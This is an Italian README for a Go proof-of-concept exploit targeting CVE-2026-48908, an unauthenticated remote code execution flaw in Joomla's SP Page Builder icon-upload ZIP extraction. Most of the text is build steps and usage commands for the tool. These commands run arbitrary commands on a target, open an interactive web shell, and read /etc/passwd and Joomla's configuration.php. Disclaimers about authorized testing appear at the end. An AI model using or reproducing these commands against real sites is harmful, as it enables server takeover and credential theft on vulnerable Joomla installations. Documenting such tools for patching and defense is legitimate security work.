CVE-2026-48908 - SP Page Builder Joomla RCE non autenticato
Proof of Concept exploit per CVE-2026-48908, una vulnerabilità di Remote Code Execution non autenticata nel componente SP Page Builder di Joomla.
CVE-2026-48908 è una vulnerabilità di sicurezza critica che consente ad attaccanti non autenticati di eseguire codice arbitrario su installazioni Joomla vulnerabili attraverso una gestione impropria dell'estrazione di file ZIP nel componente SP Page Builder.
index.php?option=com_sppagebuilder&task=asset.uploadCustomIconLa vulnerabilità risiede nella funzionalità di caricamento delle risorse dove l'applicazione convalida ed estrae in modo improprio i file ZIP contenenti risorse icon. Un attaccante può creare un file ZIP malevolo con payload PHP che verranno estratti in una directory accessibile via web, consentendo l'esecuzione di codice remoto.
golang.org/x/term - Utility terminali per input sicuro della passwordgit clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go
I binari precompilati sono disponibili nella sezione releases.


./poc_tot -target http://target-site.com -cmd "whoami"
./poc_tot -target http://target-site.com -shell
./poc_tot -target http://target-site.com -check
./poc_tot -target http://target-site.com -cleanup
./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"
-target string
Target URL of vulnerable Joomla installation (required)
Example: http://target.com or https://target.com
-cmd string
System command to execute on target
Example: "cat /etc/passwd"
-shell
Launch interactive shell on target (requires successful exploitation)
-check
Check if target is vulnerable without attempting exploitation
-cleanup
Remove uploaded shell and artifacts from target
-token string
CSRF token for exploitation (optional, auto-detected if not provided)
Lo strumento supporta molteplici vettori di sfruttamento:
./poc_tot -target http://vulnerable.local -check
./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"
./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"
./poc_tot -target http://vulnerable.local -shell
# In shell:
> id
> whoami
> pwd
./poc_tot -target http://vulnerable.local -cleanup
Se stai eseguendo Joomla con il componente SP Page Builder:
Questo software è fornito solo a scopo educativo e per test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Gli autori non accettano responsabilità per uso improprio o danni causati da questo strumento. Gli utenti sono responsabili di assicurarsi di avere la corretta autorizzazione prima di utilizzare questo strumento su qualsiasi sistema bersaglio.
Utilizzando questo strumento, riconosci che:
Questo strumento è destinato esclusivamente alla ricerca di sicurezza difensiva e ai test di penetrazione autorizzati. L'accesso non autorizzato a sistemi informatici viola il Computer Fraud and Abuse Act e leggi simili in altre giurisdizioni. Ottieni sempre la corretta autorizzazione per iscritto prima di eseguire test di sicurezza.
index.php?option=com_installer&view=manageI contributi alla ricerca sulla sicurezza sono benvenuti. Si prega di:
GhostGTR666 (Gagaltotal666)
Per problemi, domande o contributi:
Questo progetto è fornito così com'è per scopi di ricerca sulla sicurezza. Verifica le leggi locali riguardanti gli strumenti di sicurezza e i test di penetrazione prima dell'utilizzo.
Ultimo Aggiornamento: 2026-06-24
Dichiarazione di Esclusione di Responsabilità: Questo strumento è destinato solo a test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale.